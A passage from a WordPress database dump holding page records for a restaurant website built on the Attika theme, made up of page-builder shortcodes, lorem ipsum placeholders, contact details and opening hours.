!important;}\"][vc_column width=\"1/12\"][/vc_column][vc_column width=\"5/6\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h3\" disable_break_words=\"no\" title=\"Menu\" text_margin=\"30px\" line_length=\"0px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis et nulla vitae nunc molestie laoreet. Aliquam at malesuada eros. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed quis aliquet ligula. Interdum et malesuada fames ac ante ipsum primis in faucibus. Donec urna justo, mollis ut vestibulum.[/mkdf_section_title][vc_row_inner content_text_aligment=\"right\"][vc_column_inner][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" margin=\"53px 0% 0 0%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row full_height=\"yes\" equal_height=\"yes\"][vc_column][mkdf_video_button video_link=\"https://vimeo.com/183648707\" video_image=\"2020\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1535368714455{padding-top: 123px !important;padding-bottom: 90px !important;}\"][vc_column width=\"1/12\"][/vc_column][vc_column width=\"5/6\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h3\" disable_break_words=\"no\" title=\"accolades\" text_margin=\"30px\" line_length=\"0px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis et nulla vitae nunc molestie laoreet. Aliquam at malesuada eros. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed quis aliquet ligula. Interdum et malesuada fames ac ante ipsum primis in faucibus. Donec urna justo, mollis ut vestibulum.[/mkdf_section_title][vc_row_inner content_text_aligment=\"right\"][vc_column_inner][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" margin=\"53px 0% 0 0%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1535960592176{margin-right: 0px !important;margin-left: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1535011548259{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-3 vc_col-md-6 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#e7dfdf\" content_padding=\"124px 0\" title=\"Generic inquiries\" email=\"info@attika.ny\" link=\"mailto:info@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1535011578720{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-3 vc_col-md-6 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" content_padding=\"124px 0\" title=\"Press\" email=\"press@attika.ny\" link=\"mailto:press@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1535011594412{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-3 vc_col-md-6 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#ebebeb\" content_padding=\"124px 0\" title=\"Job Inquiries\" email=\"work@attika.ny\" link=\"mailto:work@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1535011617855{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-3 vc_col-md-6 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#ebebeb\" content_padding=\"124px 0\" title=\"Events\" email=\"work@attika.ny\" link=\"mailto:work@attika.ny\"][/vc_column][/vc_row]','Home 1','','publish','closed','closed','','fine-dining','','','2020-12-05 17:49:44','2020-12-05 16:49:44','',0,'http://attika.mikado-themes.com/?page_id=664',0,'page','',0),(3057,1,'2018-08-08 10:40:28','2018-08-08 10:40:28','[vc_row content_placement=\"top\" content_text_aligment=\"center\"][vc_column][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"two-columns\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" vertical_alignment=\"top\" item_padding=\"0 0 0 38%\" item_padding_680=\"0 0 10% 5%\" item_padding_681_768=\"0 0 6% 9%\" item_padding_1367_1600=\"0 0 0 13%\" item_padding_1025_1366=\"0 0 0 15%\" item_padding_769_1024=\"0 0 7% 9%\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" line_length=\"120px\" title=\"Our goals &amp; history\" title_break_words=\"1,3\" text=\"Etiam rhoncus. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Phasellus viverra nulla ut metus varius laoreet. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Quisque rutrum.\n\nNakon brejka\" text_margin=\"45px\" line_margin=\"50px 9% 0 14%\" holder_padding=\"0 0 15% 0\" text_padding=\"100px\" text_right_padding=\"90px\"]Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum. Donec vitae sapien ut libero venenatis faucibus. Nullam quis ante. Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus etiamsit amet orci eget eros faucibus tincidunt duis leosed fringilla mauris sit amet nibh metus varius laoreet.[vc_empty_space height=\"30px\"]Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.[vc_empty_space height=\"30px\"]Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus etiamsit amet orci eget eros faucibus tincidunt duis leosed fringilla mauris sit amet nibh metus varius laoreet.[/mkdf_section_title][/mkdf_elements_holder_item][mkdf_elements_holder_item vertical_alignment=\"top\" item_padding=\"0 0 0 9%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"745\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1533725150863{padding-top: 210px !important;padding-bottom: 200px !important;}\"][vc_column][mkdf_testimonials skin=\"\" slider_loop=\"yes\" slider_autoplay=\"yes\" slider_navigation=\"yes\" enable_navigation_numbers=\"yes\" navigation_number_position=\"outer\" slider_pagination=\"no\" number=\"3\" category=\"testimonials-1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1534513038512{padding-bottom: 200px !important;}\"][vc_column][vc_row_inner content_placement=\"top\" row_content_width=\"grid\" enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"bottom\" enable_parallax_effect=\"no\" left_parallax_background_element=\"751\"][vc_column_inner width=\"1/12\" css=\".vc_custom_1534514381983{padding-right: 0px !important;}\" offset=\"vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column_inner][vc_column_inner css=\".vc_custom_1534514542346{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-4 vc_col-md-5 vc_col-xs-12\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_offset=\"30\" parallax_smoothness=\"30\" image=\"752\" image_size=\"full\"][/vc_column_inner][vc_column_inner width=\"1/12\" css=\".vc_custom_1534514550307{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-2 vc_col-md-1 vc_hidden-sm vc_hidden-xs\"][/vc_column_inner][vc_column_inner css=\".vc_custom_1534514557722{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-4 vc_col-md-6 vc_col-xs-12\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" line_length=\"120px\" title=\"History timetable\" title_break_words=\"1\" text=\"Etiam rhoncus. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Phasellus viverra nulla ut metus varius laoreet. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Quisque rutrum.\n\nNakon brejka\" text_margin=\"20px\" line_margin=\"50px 9% 0 14%\" holder_padding=\"0 0 15% 0\" text_padding=\"100px\" text_right_padding=\"40px\"]\n<h5>2016</h5>\nRestaurant official opening\non chef’s birthday[vc_empty_space height=\"1px\"]\n<h5>2015</h5>\nIdea for Attika restaurant[vc_empty_space height=\"1px\"]\n<h5>2016</h5>\nRestaurant official opening\non chef’s birthday[vc_empty_space height=\"1px\"]\n<h5>2017</h5>\nMicheline first star[vc_empty_space height=\"1px\"]\n<h5>2018</h5>\nTwo Micheline stars, including chef\nrecomendations for main meals[/mkdf_section_title][/vc_column_inner][vc_column_inner width=\"1/12\" css=\".vc_custom_1534514436317{padding-left: 0px !important;}\" offset=\"vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]','Restaurant History','','publish','closed','closed','','restaurant-history','','','2018-08-08 10:40:28','2018-08-08 10:40:28','',0,'http://attika.mikado-themes.com/?page_id=744',0,'page','',0),(3058,1,'2018-08-08 11:04:26','2018-08-08 11:04:26','<p>[vc_row content_placement=\"top\" enable_parallax_background_elements=\"yes\" right_parallax_background_element=\"762\"][vc_column][vc_row_inner content_placement=\"middle\" row_content_width=\"grid\" css=\".vc_custom_1535380918653{padding-bottom: 40px !important;}\"][vc_column_inner offset=\"vc_col-lg-6 vc_col-md-12\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" line_length=\"120px\" title=\"Our kitchen\" title_break_words=\"1,3\" text=\"Etiam rhoncus. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Phasellus viverra nulla ut metus varius laoreet. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Quisque rutrum.</p>\n<p>Nakon brejka\" text_margin=\"45px\" line_margin=\"50px 9% 0 14%\" holder_padding=\"0 0 15% 0\" text_padding=\"100px\" text_right_padding=\"40px\"]Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum. Donec vitae sapien ut libero venenatis faucibus. Nullam quis ante. Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus ete magnis dis parturient montes, nascetur ridiculus mus etiamsit amet orci eget bibendum sodales cursus. Lorem ipsum dolor sit amet, consectetuer adipiscing elit nean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque.[/mkdf_section_title][vc_empty_space height=\"100px\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-6 vc_col-md-12\" css=\".vc_custom_1535446084271{padding-right: 0px !important;padding-left: 0px !important;}\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image_size=\"full\" image=\"761\"][/vc_column_inner][/vc_row_inner][vc_row_inner row_content_width=\"grid\" css=\".vc_custom_1534240845257{padding-bottom: 30px !important;}\"][vc_column_inner offset=\"vc_col-lg-offset-1 vc_col-lg-10\" css=\".vc_custom_1534234226432{padding-right: 0px !important;padding-left: 0px !important;}\"][mkdf_single_image enable_image_shadow=\"no\" image_behavior=\"custom-link\" center_image=\"no\" image=\"926\" image_size=\"full\" custom_link=\"http://attika.mikado-themes.com/portfolio-item/seasoning-time/\"][/vc_column_inner][/vc_row_inner][vc_row_inner row_content_width=\"grid\"][vc_column_inner width=\"1/12\" offset=\"vc_col-lg-1 vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column_inner][vc_column_inner css=\".vc_custom_1535445707647{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-10 vc_col-md-12 vc_col-xs-12\"][mkdf_image_gallery type=\"masonry\" enable_image_shadow=\"no\" image_behavior=\"custom-link\" number_of_columns=\"three\" space_between_items=\"normal\" images=\"2224,2222\" image_size=\"full\" custom_links=\"http://attika.mikado-themes.com/portfolio-item/homemade-dining/, http://attika.mikado-themes.com/portfolio-item/italian-kiss/\"][/vc_column_inner][vc_column_inner width=\"1/12\" css=\".vc_custom_1535382774510{padding-right: 0px !important;}\" offset=\"vc_col-lg-1 vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1535445887028{padding-top: 140px !important;padding-bottom: 35px !important;}\"][vc_column][vc_row_inner row_content_width=\"grid\" content_text_aligment=\"center\"][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-4\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 50%\" line_length=\"20px\" title=\"Joseph Parker\"][/mkdf_section_title][vc_column_text css=\".vc_custom_1533823767013{padding-top: 10px !important;}\"]Main Chef[/vc_column_text][vc_empty_space height=\"80px\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-4\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 50%\" line_length=\"20px\" title=\"Nancy Newman\"][/mkdf_section_title][vc_column_text css=\".vc_custom_1533823767013{padding-top: 10px !important;}\"]Main Chef[/vc_column_text][vc_empty_space height=\"80px\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-4\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 50%\" line_length=\"20px\" title=\"Lisa Mills\"][/mkdf_section_title][vc_column_text css=\".vc_custom_1533823767013{padding-top: 10px !important;}\"]Main Chef[/vc_column_text][vc_empty_space height=\"80px\"][/vc_column_inner][/vc_row_inner][vc_row_inner row_content_width=\"grid\" content_text_aligment=\"center\"][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-4\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 50%\" line_length=\"20px\" title=\"Joyce Pena\"][/mkdf_section_title][vc_column_text css=\".vc_custom_1533823767013{padding-top: 10px !important;}\"]Main Chef[/vc_column_text][vc_empty_space height=\"80px\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-4\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 50%\" line_length=\"20px\" title=\"Ralph Barnes\"][/mkdf_section_title][vc_column_text css=\".vc_custom_1533823767013{padding-top: 10px !important;}\"]Main Chef[/vc_column_text][vc_empty_space height=\"80px\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-4\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 50%\" line_length=\"20px\" title=\"Edward Cooper\"][/mkdf_section_title][vc_column_text css=\".vc_custom_1533823767013{padding-top: 10px !important;}\"]Main Chef[/vc_column_text][vc_empty_space height=\"80px\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1535445909857{padding-bottom: 200px !important;}\"][vc_column][vc_row_inner content_placement=\"middle\" row_content_width=\"grid\"][vc_column_inner offset=\"vc_col-lg-6 vc_col-md-12\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" line_length=\"120px\" title=\"Open job positions\" title_break_words=\"1,2\" text=\"Etiam rhoncus. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Phasellus viverra nulla ut metus varius laoreet. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Quisque rutrum.</p>\n<p>Nakon brejka\" text_margin=\"45px\" line_margin=\"50px 9% 0 14%\" holder_padding=\"0 0 15% 0\" text_padding=\"100px\" text_right_padding=\"30px\"]Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes nascetur.[/mkdf_section_title][/vc_column_inner][vc_column_inner width=\"7/12\" css=\".vc_custom_1535447972496{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-4 vc_col-md-7\"][vc_empty_space height=\"100px\"][mkdf_info_box title_tag=\"\" box_background_color=\"#f6efe6\" content_padding=\"22%\" title=\"Job inquiry\" email=\"work@attika.ny\" link=\"mailto:work@attika.ny\"][/vc_column_inner][vc_column_inner width=\"5/12\" css=\".vc_custom_1535447959496{margin-top: -15px !important;margin-left: -30px !important;padding-top: 0px !important;padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-2 vc_col-md-5\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"778\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\n','Our Kitchen','','publish','closed','closed','','our-kitchen','','','2018-08-08 11:04:26','2018-08-08 11:04:26','',0,'http://attika.mikado-themes.com/?page_id=760',0,'page','',0),(3059,1,'2018-08-08 13:10:07','2018-08-08 13:10:07','[vc_row content_placement=\"middle\" row_content_width=\"grid\" content_text_aligment=\"right\" css=\".vc_custom_1535635181617{padding-top: 130px !important;}\"][vc_column width=\"2/3\" offset=\"vc_col-lg-4 vc_col-md-8 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 0\" item_padding_1367_1600=\"0 0 0% 0\" item_padding_1025_1366=\"0 0 0% 0\" item_padding_769_1024=\"0 0 11% 0\" item_padding_681_768=\"0 0 13% 0\" item_padding_680=\"0 0 20% 0\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" line_length=\"120px\" title=\"Siamo aperti\" title_break_words=\"1\" text=\"Attica Fine Dining Restaurant\r\nRainbow Ridge Dr street 35\r\nNY City, NY\" text_margin=\"45px\" line_margin=\"50px 14% 0 20%\"]Dal martedì alla domenica\r\n12.00 - 14.30[/mkdf_section_title][vc_empty_space height=\"62px\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"1/3\" offset=\"vc_col-lg-1 vc_col-md-4 vc_hidden-xs\"][/vc_column][vc_column offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][vc_column_text]\r\n<p style=\"text-align: left;\">Puoi prenotare il tuo evento speciale</p>\r\n<a href=\"https://www.ristorantesolymar.it/acquista-cena/\">Vai</a>[/vc_column_text][vc_empty_space height=\"55px\"][/vc_column][vc_column offset=\"vc_col-lg-3 vc_col-md-12 vc_col-xs-12\"][vc_column_text]\r\n<p style=\"text-align: left;\">Idea regalo? Acquista un coupon, regala un\'esperienza</p>\r\n<a href=\"https://www.ristorantesolymar.it/regala-cena/\">Vai</a>[/vc_column_text][vc_empty_space height=\"85px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column width=\"2/3\" offset=\"vc_col-lg-4 vc_col-md-8 vc_hidden-xs\"][/vc_column][vc_column width=\"1/3\" offset=\"vc_col-lg-4 vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1535116332165{margin-top: -50px !important;margin-bottom: -210px !important;}\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"2120\" image_size=\"full\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1534504832287{padding-top: 100px !important;padding-bottom: 200px !important;}\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"20px 0 -10px 50%\" line_length=\"45px\" title=\"Contattaci\"][/mkdf_section_title][contact-form-7 id=\"203\"][/vc_column][/vc_row]','Orari di apertura','','publish','closed','closed','','orari-di-apertura','','','2021-01-23 18:26:01','2021-01-23 17:26:01','',0,'http://attika.mikado-themes.com/?page_id=793',0,'page','',0),(3979,1,'2021-01-20 18:44:59','2021-01-20 17:44:59','[vc_row content_placement=\"middle\" row_content_width=\"grid\" content_text_aligment=\"right\" css=\".vc_custom_1535635181617{padding-top: 130px !important;}\"][vc_column width=\"2/3\" offset=\"vc_col-lg-4 vc_col-md-8 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 0\" item_padding_1367_1600=\"0 0 0% 0\" item_padding_1025_1366=\"0 0 0% 0\" item_padding_769_1024=\"0 0 11% 0\" item_padding_681_768=\"0 0 13% 0\" item_padding_680=\"0 0 20% 0\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" line_length=\"120px\" title=\"Opening hours\" title_break_words=\"1\" text=\"Attica Fine Dining Restaurant\r\nRainbow Ridge Dr street 35\r\nNY City, NY\" text_margin=\"45px\" line_margin=\"50px 14% 0 20%\"]Dal martedì alla domenica\r\n12.00 - 14.30[/mkdf_section_title][vc_empty_space height=\"62px\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"1/3\" offset=\"vc_col-lg-1 vc_col-md-4 vc_hidden-xs\"][/vc_column][vc_column offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][vc_column_text]\r\n<p style=\"text-align: left;\">Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis..</p>\r\n[/vc_column_text][vc_empty_space height=\"55px\"][/vc_column][vc_column offset=\"vc_col-lg-3 vc_col-md-12 vc_col-xs-12\"][vc_column_text]\r\n<p style=\"text-align: left;\">Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.</p>\r\n[/vc_column_text][vc_empty_space height=\"85px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column width=\"2/3\" offset=\"vc_col-lg-4 vc_col-md-8 vc_hidden-xs\"][/vc_column][vc_column width=\"1/3\" offset=\"vc_col-lg-4 vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1535116332165{margin-top: -50px !important;margin-bottom: -210px !important;}\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"2120\" image_size=\"full\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1534504832287{padding-top: 100px !important;padding-bottom: 200px !important;}\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"20px 0 -10px 50%\" line_length=\"45px\" title=\"Reservation\"][/mkdf_section_title][contact-form-7 id=\"203\"][/vc_column][/vc_row]','Opening Hours','','inherit','closed','closed','','3059-revision-v1','','','2021-01-20 18:44:59','2021-01-20 17:44:59','',3059,'https://www.ristorantesolymar.it/2021/01/20/3059-revision-v1/',0,'revision','',0),(3060,1,'2018-08-13 07:40:43','2018-08-13 07:40:43','<p>[vc_row full_height=\"yes\" equal_height=\"yes\"][vc_column][mkdf_portfolio_slider enable-center=\"no\" enable-auto-width=\"yes\" space_between_items=\"no\" image_proportions=\"full\" orderby=\"date\" order=\"ASC\" portfolio_slider_full_height_decrease=\"no\" item_style=\"gallery-overlay\" title_tag=\"h6\" enable_category=\"no\" enable_loop=\"yes\" enable_autoplay=\"yes\" enable_navigation=\"yes\" enable_navigation_numbers=\"yes\" navigation_number_position=\"inner\" navigation_skin=\"dark\" enable_pagination=\"no\" enable_mousewheel_scroll=\"yes\" category=\"pesce\" tag=\"pesce\"][/vc_column][/vc_row]</p>\r\n','Fullscreen Showcase','','publish','closed','closed','','fullscreen-showcase','','','2020-12-06 18:31:08','2020-12-06 17:31:08','',0,'http://attika.mikado-themes.com/?page_id=1008',0,'page','',0),(3061,1,'2018-08-13 14:36:12','2018-08-13 14:36:12','','Portfolio','','publish','closed','closed','','portfolio','','','2018-08-13 14:36:12','2018-08-13 14:36:12','',0,'http://attika.mikado-themes.com/?page_id=1149',0,'page','',0),(3062,1,'2018-08-13 14:42:57','2018-08-13 14:42:57','[vc_row][vc_column][mkdf_portfolio_list type=\"gallery\" number_of_columns=\"three\" space_between_items=\"normal\" number_of_items=\"9\" image_proportions=\"square\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" title_tag=\"h5\" category=\"kitchen\"][/vc_column][/vc_row]','Three Columns','','publish','closed','closed','','three-columns','','','2018-08-13 14:42:57','2018-08-13 14:42:57','',3061,'http://attika.mikado-themes.com/?page_id=1151',0,'page','',0),(3063,1,'2018-08-13 14:48:34','2018-08-13 14:48:34','[vc_row][vc_column][mkdf_portfolio_list type=\"gallery\" number_of_columns=\"four\" space_between_items=\"normal\" number_of_items=\"4\" image_proportions=\"square\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" title_tag=\"h5\" category=\"meals\"][vc_empty_space height=\"30px\"][mkdf_portfolio_list type=\"gallery\" number_of_columns=\"four\" space_between_items=\"normal\" number_of_items=\"4\" image_proportions=\"square\" enable_image_shadow=\"no\" orderby=\"date\" order=\"DESC\" title_tag=\"h5\" category=\"homemade\"][/vc_column][/vc_row]','Four Columns','','publish','closed','closed','','four-columns','','','2018-08-13 14:48:34','2018-08-13 14:48:34','',3061,'http://attika.mikado-themes.com/?page_id=1160',0,'page','',0),(3064,1,'2018-08-14 10:00:21','2018-08-14 10:00:21','[vc_row][vc_column][mkdf_portfolio_list type=\"gallery\" number_of_columns=\"four\" space_between_items=\"normal\" number_of_items=\"4\" image_proportions=\"square\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" title_tag=\"h5\" category=\"meals\"][vc_empty_space height=\"30px\"][mkdf_portfolio_list type=\"gallery\" number_of_columns=\"four\" space_between_items=\"normal\" number_of_items=\"4\" image_proportions=\"square\" enable_image_shadow=\"no\" orderby=\"date\" order=\"DESC\" title_tag=\"h5\" category=\"homemade\"][/vc_column][/vc_row]','Four Columns Wide','','publish','closed','closed','','four-columns-wide','','','2018-08-14 10:00:21','2018-08-14 10:00:21','',3061,'http://attika.mikado-themes.com/?page_id=1167',0,'page','',0),(3065,1,'2018-08-14 10:05:50','2018-08-14 10:05:50','[vc_row][vc_column][mkdf_portfolio_list type=\"gallery\" number_of_columns=\"three\" space_between_items=\"normal\" number_of_items=\"9\" image_proportions=\"square\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" item_style=\"gallery-overlay\" title_tag=\"h5\" enable_category=\"no\" category=\"kitchen\"][/vc_column][/vc_row]','Three Columns Gallery','','publish','closed','closed','','three-columns-gallery','','','2018-08-14 10:05:50','2018-08-14 10:05:50','',3061,'http://attika.mikado-themes.com/?page_id=1182',0,'page','',0),(3066,1,'2018-08-14 10:06:57','2018-08-14 10:06:57','[vc_row][vc_column][mkdf_portfolio_list type=\"gallery\" number_of_columns=\"four\" space_between_items=\"normal\" number_of_items=\"4\" image_proportions=\"square\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" item_style=\"gallery-overlay\" title_tag=\"h5\" enable_category=\"no\" category=\"meals\"][vc_empty_space height=\"30px\"][mkdf_portfolio_list type=\"gallery\" number_of_columns=\"four\" space_between_items=\"normal\" number_of_items=\"4\" image_proportions=\"square\" enable_image_shadow=\"no\" orderby=\"date\" order=\"DESC\" item_style=\"gallery-overlay\" title_tag=\"h5\" enable_category=\"no\" category=\"homemade\"][/vc_column][/vc_row]','Four Columns Gallery','','publish','closed','closed','','four-columns-gallery','','','2018-08-14 10:06:57','2018-08-14 10:06:57','',3061,'http://attika.mikado-themes.com/?page_id=1185',0,'page','',0),(3067,1,'2018-08-14 10:08:19','2018-08-14 10:08:19','[vc_row][vc_column][mkdf_portfolio_list type=\"gallery\" number_of_columns=\"four\" space_between_items=\"normal\" number_of_items=\"4\" image_proportions=\"square\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" item_style=\"gallery-overlay\" title_tag=\"h5\" 